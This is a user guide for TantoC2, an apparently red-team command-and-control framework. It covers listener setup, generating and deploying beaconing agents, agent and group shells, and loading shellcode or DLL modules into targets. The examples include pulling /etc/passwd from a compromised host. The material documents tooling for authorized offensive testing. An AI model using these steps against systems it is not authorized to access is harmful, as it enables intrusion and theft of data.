Operator Guide

Table of Contents

Day-to-day usage of TantoC2 from an operator’s perspective.

Connecting
#

1
2
3
4
tantoc2> connect http://<teamserver-host>:8443
tantoc2> login <username>
Password: ********
Logged in as <username>

CLI Shell
#

The CLI provides an interactive command loop with a context-aware prompt:

1
2
tantoc2>                          # Not connected / no engagement
tantoc2[my-pente]>                # Engagement selected (first 8 chars)

Tab Completion
#

Tab completion works at every argument position:

Commands and sub-commands: agents, modules, tools, then list, run, use
Dynamic entity IDs: Agent hostnames, module names, build IDs, credential IDs
Flags: --listener, --kill-date, --interval, etc.
Flag values: Static choices (protocols) and dynamic lookups (credential IDs)
Module options: Schema-driven flags from module OptionSchema definitions

JSON Mode
#

For scripting, get all output as JSON:

1
tantoc2-cli --url http://127.0.0.1:8443 --json-mode

Or per-command:

1
tantoc2> agents list --json

TUI Mode
#

The CLI includes a Textual-based TUI with panels and split views. Themes can be switched with Ctrl+P from 5 options: default, monokai, hotdog_stand, light, matrix.

Engagement Workflow
#

Select an Engagement
#

1
2
tantoc2> engagements list
tantoc2> engagements use <engagement-id>

Listener Setup
#

1
2
3
tantoc2[my-op]> listeners create http --name my-http --port 8080
tantoc2[my-op]> listeners start my-http
tantoc2[my-op]> listeners list

Agent Management
#

Building an Agent
#

1
2
3
4
5
tantoc2[my-op]> agents generate dev_agent \
    --listener my-http \
    --kill-date 2026-12-31 \
    --interval 5 \
    --jitter 10

Flag	Description
`--listener <name>[:<ip>]`	Listener for callback (required)
`--kill-date YYYY-MM-DD`	Kill date
`--kill-days <N>`	Kill date relative (alternative)
`--interval <seconds>`	Beacon interval
`--jitter <percent>`	Beacon jitter

Deploying
#

1
tantoc2-dev-agent --server http://<teamserver-host>:8080 --mode beacon --interval 5

Option	Description
`--server <url>`	Callback URL (required)
`--mode beacon\|session`	Operating mode (default: beacon)
`--interval <seconds>`	Beacon interval (default: 60)
`--jitter <percent>`	Jitter percentage (default: 10)
`--fallback <url> [url ...]`	Fallback callback URLs

Agent Lifecycle
#

1
2
3
Active  -->  Dormant  -->  Dead
  |                         |
  +------>  Killed  <-------+

Active: Checking in within expected intervals
Dormant: Missed 3x beacon interval (30s floor) — may recover
Dead: Missed 10x beacon interval (90s floor)
Killed: Explicitly terminated by operator

Interactive Shells
#

Agent Shell
#

Enter a per-agent interactive shell with agents use:

1
2
3
4
5
tantoc2[my-op]> agents use WORKSTATION-01
WORKSTATION-01> ls /tmp
WORKSTATION-01> whoami
WORKSTATION-01> ps
WORKSTATION-01> download /etc/passwd

Agents can be identified by hostname, hostname:shortid (for disambiguation when multiple agents share a hostname), or full UUID.

The agent shell provides formatted output — tables for ls, ps, netstat; colored error highlighting. Built-in commands include ls, cat, pwd, cd, whoami, env, ps, netstat, upload, download. Remote path completion is available (cached from ls results — no implicit C2 traffic).

Session agents use tight polling (~0.5s) for near-instant responses. Beacon agents poll at the beacon interval.

Use !<command> or local_shell to execute local shell commands from within the agent shell.

Group Shell
#

Create a group and interact with multiple agents simultaneously:

1
2
3
4
tantoc2[my-op]> agents group create webservers <id1> <id2>
tantoc2[my-op]> agents group use webservers
webservers[2]> whoami
webservers[2]> ps

Commands are sent to all agents in the group. Use ;; to chain multiple commands.

Tools Shell
#

Enter an interactive tools session:

1
2
tantoc2[my-op]> tools use ssh
ssh> ...

The tools shell provides interactive access to remote services (SSH, SMB, etc.) with proxy and credential integration.

Tasking
#

Creating Tasks
#

1
2
3
tantoc2[my-op]> agents use <hostname>
WORKSTATION-01> task survey
WORKSTATION-01> task beacon_config {"interval": 10, "jitter": 5}

Task Types
#

Type	Description	Payload
`survey`	Collect system metadata	None
`beacon_config`	Adjust beacon interval/jitter	`{"interval": N, "jitter": N}`
`kill`	Terminate the agent	None
`upload`	Upload file to agent	Via file transfer commands
`download`	Download file from agent	Via file transfer commands
`load_module`	Load an agent module into the agent	`{"module_name": "...", "daemonize": false, "options": {...}}`
`unload_module`	Unload a running managed module	`{"module_name": "..."}`

Viewing Results
#

1
2
tantoc2[my-op]> tasks list <agent-id>
tantoc2[my-op]> tasks result <agent-id> <task-id>

Tasks can be run in the background with & and results polled later.

Modules
#

Modules are compiled payloads (BOF, shellcode, DLL, Python scripts, etc.) that are loaded directly into agents on targets. The teamserver filters modules by the agent’s declared capabilities.

Browsing Modules
#

1
2
3
4
tantoc2[my-op]> modules list                    # All modules
tantoc2[my-op]> modules compatible <agent-id>   # Only compatible modules
tantoc2[my-op]> modules info <module-name>      # Module details
tantoc2[my-op]> modules refresh                 # Refresh module registry

The module browser filters by the selected agent’s format, platform, and architecture — only compatible modules are shown.

Loading a Module
#

Module loading and unloading is done from the agent shell:

1
2
tantoc2[my-op]> agents use <hostname>
<hostname>> load <module-name> <format>

The <format> must match one of the agent’s supported module formats (e.g., py, bof, shellcode). In managed mode (the default), results flow back through the agent’s channel.

For daemonized mode (payload runs independently, may register as a new agent):

1
<hostname>> load <module-name> <format> --daemonize

Unloading a Module
#

1
<hostname>> unload <loaded-module-id>

Use loaded to see module IDs. Cleanly terminates a running managed module.

Viewing Loaded Modules
#

1
2
<hostname>> loaded
<hostname>> capabilities

P2P Relay & Topology
#

Viewing Topology
#

1
tantoc2[my-op]> agents topology

Displays the P2P relay hierarchy as a tree. Agents connected directly to the teamserver appear at the root; agents relaying through others appear as children.

Viewing a Relay Chain
#

1
tantoc2[my-op]> agents chain <agent-id>

Shows the full path from an agent back to the teamserver through any relay agents.

How P2P Works
#

Relay agents forward traffic for interior agents without inspecting it (end-to-end encrypted)
The teamserver auto-discovers relay topology from forwarded messages
Parent-child relationships are tracked when agents are spawned via daemonized modules
Session agents cannot relay through beacon agents

Next Steps
#

Credential Management for working with the credential store
File Transfers for upload/download operations
Tools (Remote Operations) for direct protocol interaction
Agent Modules for the full agent module developer reference

Connecting#

CLI Shell#

Tab Completion#

JSON Mode#

TUI Mode#

Engagement Workflow#

Select an Engagement#

Listener Setup#

Agent Management#

Building an Agent#

Deploying#

Agent Lifecycle#

Interactive Shells#

Agent Shell#

Group Shell#

Tools Shell#

Tasking#

Creating Tasks#

Task Types#

Viewing Results#

Modules#

Browsing Modules#

Loading a Module#

Unloading a Module#

Viewing Loaded Modules#

P2P Relay & Topology#

Viewing Topology#

Viewing a Relay Chain#

How P2P Works#

Next Steps#